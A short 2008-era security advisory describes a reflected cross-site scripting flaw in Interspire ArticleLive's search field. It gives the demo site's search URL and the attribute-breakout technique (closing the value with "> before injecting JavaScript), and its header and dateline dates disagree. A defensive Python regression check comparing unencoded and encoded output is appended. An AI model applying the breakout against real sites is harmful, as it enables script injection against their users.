____________________________________________________________________________
____________________________________________________________________________

01010111 01001001 01010010 01000101 01000100 01010011 -> 01000101 01000011 01010101 01010010 01001001 01010100 -> 01011001

____________________________________________________________________________

ADVISORY: INTERSPIRE ARTICLELIVE NX XSS
____________________________________________________________________________

_____________________
|| 0x00: ABOUT ME
|| 0x01: DATELINE
|| 0x02: INFORMATION
|| 0x03: EXPLOITATION
|| 0x04: RISK LEVEL

____________________________________________________________
____________________________________________________________

_________________
|| 0x00: ABOUT ME

Author: SkyOut
Date: May 2008
Website: http://wired-security.net/

_________________
|| 0x01: DATELINE

2007-05-09: Bug found
2007-05-10: Advisory released

____________________
|| 0x02: INFORMATION

The website of the product, located at
http://www.interspire.com/articlelive/, says the following about their tool:

"ArticleLive is a complete content management package that lets you start,
maintain and grow your own article, news and/or blog site. It includes
professionally designed, CSS-driven website templates which are easy to
customize to your liking."

So it is a news script. Now the problem occurs because the search engine
filters its input badly! The search string is written back into the value=""
attribute of the search field, so you can easily escape that attribute and
inject JavaScript.

_____________________
|| 0x03: EXPLOITATION

To test this, try a demo, they provide it for free:
http://www.interspire.com/articlelive/demo.php

Then go to the page that includes the search field, it is located here:
http://websitepublisher.interspire-demo.com/demo_/search

Escape the given string with "> first and then add your JavaScript!

E.g.: ">

Results in:

__________________________________________
|                                      X |
|________________________________________|
|                                        |
|                                        |
|       ^                                |
|      / \                               |
|     / | \     XSS                      |
|    /  .  \                             |
|    -------                             |
|                 ______                 |
|                 | OK |                 |
|                 ------                 |
|________________________________________|

___________________
|| 0x04: RISK LEVEL

- LOW - (1/3) -

Happy Hacking

____________________________________________________________________________
____________________________________________________________________________

EOF
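
Added example, not part of the original advisory and not Interspire's code: a regression check for the value="" breakout described in 0x02, comparing an unencoded search field with an attribute-encoded one. The form template, function names and sample inputs are assumptions constructed for illustration.

```python
from html import escape
from html.parser import HTMLParser

# Hypothetical template standing in for the search form (not ArticleLive's markup).
FORM = '<form action="/search"><input type="text" name="q" value="{q}"></form>'

def render_vulnerable(query):
    # The query is written into value="" unencoded: the flaw the advisory describes.
    return FORM.format(q=query)

def render_hardened(query):
    # Encode &, <, > and both quote characters for an HTML attribute context.
    return FORM.format(q=escape(query, quote=True))

class _FormAudit(HTMLParser):
    """Records every start tag, every input value and any visible text."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.tags, self.values, self.text = [], [], []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "input":
            self.values.append(dict(attrs).get("value"))

    def handle_data(self, data):
        if data.strip():
            self.text.append(data)

def stays_in_attribute(html_out, query):
    """True if only form+input were parsed and value round-trips to the query."""
    audit = _FormAudit()
    audit.feed(html_out)
    audit.close()
    return (audit.tags == ["form", "input"] and audit.values == [query]
            and not audit.text)

# Constructed inputs: a benign term, a harmless breakout marker, mixed specials.
SAMPLES = ['firewall rules', '"><b>constructed-marker</b>', "it's & <ok>"]

if __name__ == "__main__":
    for s in SAMPLES:
        print(repr(s), "unencoded:", stays_in_attribute(render_vulnerable(s), s),
              "encoded:", stays_in_attribute(render_hardened(s), s))
```

The check fails for the unencoded form as soon as the input contains a double quote followed by markup, and passes for every sample once the value is encoded at output time.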